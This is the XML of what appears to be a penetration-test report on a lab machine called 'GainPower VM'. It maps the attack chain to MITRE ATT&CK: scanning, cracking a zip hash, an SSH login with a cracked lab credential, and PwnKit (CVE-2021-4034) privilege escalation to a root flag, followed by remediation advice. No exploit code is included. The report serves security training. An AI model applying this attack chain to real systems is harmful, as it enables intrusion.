        <w:gridCol w:w="27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Reconnaissance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Active Scanning</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T1595</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Nmap, netdiscover, Nikto against target host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Access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Accounts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T1078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SSH login using cracked credential (employee1:81237900)</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Discovery</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Network Service Discovery</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T1046</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Port and service enumeration with Nmap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from Local System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T1005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secret.zip exfiltration from web-accessible /secret/ directory</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Credential Access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Brute Force: Password Cracking</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T1110.002</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John the Ripper cracked pkzip hash using rockyou.txt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 and Scripting Interpreter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T1059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Shell commands executed post-SSH login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Privilege Escalation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Exploitation for Privilege Escalation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T1068</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CVE-2021-4034 PwnKit exploit against /usr/bin/pkexec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Defense Evasion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and Directory Permissions Modification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T1222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chmod +x applied to PwnKit binary</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Lateral Movement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Remote Services: SSH</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T1021.004</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SSH used to establish initial foothold as employee1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Directory Listing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable Apache directory listing globally by setting Options -Indexes in the Apache configuration file. Apply per-directory restrictions using .htaccess where necessary. Sensitive files and archives should never be stored in web-accessible directories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Options -Indexes  # Add to /etc/httpd/conf/httpd.conf or .htaccess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak Password Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce strong, unique passwords of at least 14 characters for all user accounts. Prohibit use of dictionary words or purely numeric passwords. Implement account lockout policies after repeated failed authentication attempts. Avoid reusing the same password across services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Banner Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove or sanitize the SSH MOTD banner to prevent disclosure of username formats, internal hints, or any organizational information. The banner should provide only generic legal/warning notices. Configure SSH to suppress version information where possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PwnKit / CVE-2021-4034 Patch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Update the polkit package immediately to a patched version. On CentOS/RHEL systems, apply the vendor-provided security update:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo yum update polkit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If patching is not immediately possible, remove the SUID bit from pkexec as a temporary mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 0755 /usr/bin/pkexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">General Hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly audit SUID/SGID binaries: find / -perm -u=s -type f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable and configure a host-based firewall (firewalld/iptables) to restrict access to internal services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable the HTTP TRACE method to prevent Cross-Site Tracing (XST) attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep all system packages and the Apache web server updated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Proof of Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following screenshots confirm successful full compromise of the GainPower VM target machine, achieving root-level access and reading the proof flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="762000"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="whoami.png" descr="whoami.png" title="whoa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7620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22 — whoami as employee1: Initial foothold confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="304800"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="chmod_Pwnkit.png" descr="chmod_Pwnkit.png" title="chmod_Pwnk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048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23 — ./PwnKit executed: Root shell obtained via CVE-2021-4034</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5905500" cy="2057400"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="root_flag__4_.png" descr="root_flag__4_.png" title="root_flag__4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05740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Figure 24 — Root flag: GAIN POWER — eb2e174c3883ff6b5fd871167795b4d6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Root flag: eb2e174c3883ff6b5fd871167795b4d6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Report prepared by: Greg Ochieng (Primenexuss) | Nex-Experience | github.com/PrimeNexuss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60"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Primenexuss | Nex-Experience</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60"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F3864"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">GainPower VM — Vulnerability Assessment Report</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Method: PwnKit (CVE-2021-4034)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6141fe110402f8def073803d0de2c9d36079a7d.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8fc9b8fa893a4ff56bcdd363c15256dffaf50cb9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b53d8bc32c1faf6cd71f1de3deb2a099208a3a83.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ba391739453a7d26f8c9c6f91f33cde88b170755.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/23aea950ddbfa46432c354c569246197b87e9df5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/43998036dde123b0463de62fde8ba982743df533.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/fa2debdc838880f4442b18b8ee988682bfce1b8c.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8e807e5eb36f33e139808b2f1f5ee23484ce76f6.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0dec9c9e58c9bbcd39ab6d7c019605c8e327be57.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/10a2a2c922eaf4df24f6d70ab1997fccc7bf20f2.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e12e943699c277c98d912057181982cf9b5291d7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d5bb4cd6277d0b6ee6ec08d965802d560825b945.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1f69a8cfcdd4208823b46e25311d65430bbb33d4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/dcec8a36f672337237a70eda18a37607200b5621.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f36e7927f62974795c69b8a25aeb4ea6091dfa4f.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ce655ab4a957b15da52bf3e323cf9548a84ef259.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ccd73a2f5ade45bb360a3a07bb9c9966785585e8.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9c43248d689e392c874d6ab889b05584427d4a90.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6ae1694a187a03f0e9562c73c5c64f3e59809d87.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e990eb509f83523a3ae77837fbfcadf449cce28a.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d3706ca52a33cdb6003dba39e7f7a0e25d61c8b3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1bed16324b1c25351e7cf19726e3f59e11482fdc.png"/><Relationship Id="rId3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2026-03-22T17:24:29.236Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-22T17:24:29.237Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>